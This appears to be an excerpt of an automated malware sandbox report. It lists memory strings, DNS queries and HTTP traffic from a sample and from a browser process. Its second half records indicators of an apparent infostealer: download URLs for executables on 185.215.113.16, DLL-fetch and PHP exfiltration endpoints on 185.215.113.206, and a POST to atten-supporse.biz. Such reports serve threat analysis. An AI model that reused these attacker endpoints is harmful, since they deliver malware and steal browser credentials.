"*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8644000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2921314720.00000294ACE97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2921314720.00000294ACE4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/Z equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2928411061.00000294ADCF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2903676258.00000294ABD9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2931152196.00000294ADF43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 0000001F.00000002.2903676258.00000294ABDA1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2841617207.00000294B43CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2841617207.00000294B43F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2841617207.00000294B43FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe:
Source: 5a20612cd1.exe, 00000011.00000003.3222473659.0000000005777000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3224936078.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 5a20612cd1.exe, 00000011.00000003.3222473659.0000000005777000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3224936078.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exed4Ke
Source: 5a20612cd1.exe, 00000011.00000003.3222473659.0000000005777000.00000004.00000800.00020000.00000000.sdmp, 5a20612cd1.exe, 00000011.00000003.3224936078.0000000005793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp, 0882197cda.exe, 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2220844676.000000000C319000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220844676.000000000C312000.00000004.00000020.00020000.00000000.sdmp, 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, 0882197cda.exe, 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/(
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2220844676.000000000C319000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/5
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllP
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllz
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll&
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllN
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2215093487.0000000001A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dlll
Source: file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 0882197cda.exe, 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.5f
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/D
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
Source: file.exe, 00000000.00000002.2220844676.000000000C312000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpH
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpIIEC.exe.
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJ4
Source: file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpYHZhJogONYm.exe
Source: file.exe, 00000000.00000002.2220844676.000000000C312000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.2220844676.000000000C319000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phppresolver.dll
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr4
Source: file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ta
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206Local
Source: file.exe, 00000000.00000002.2213992001.0000000000FC7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206LocalGoogle
Source: file.exe, 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Qvx
Source: file.exe, 00000000.00000002.2213992001.0000000000F2C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.phprofiles
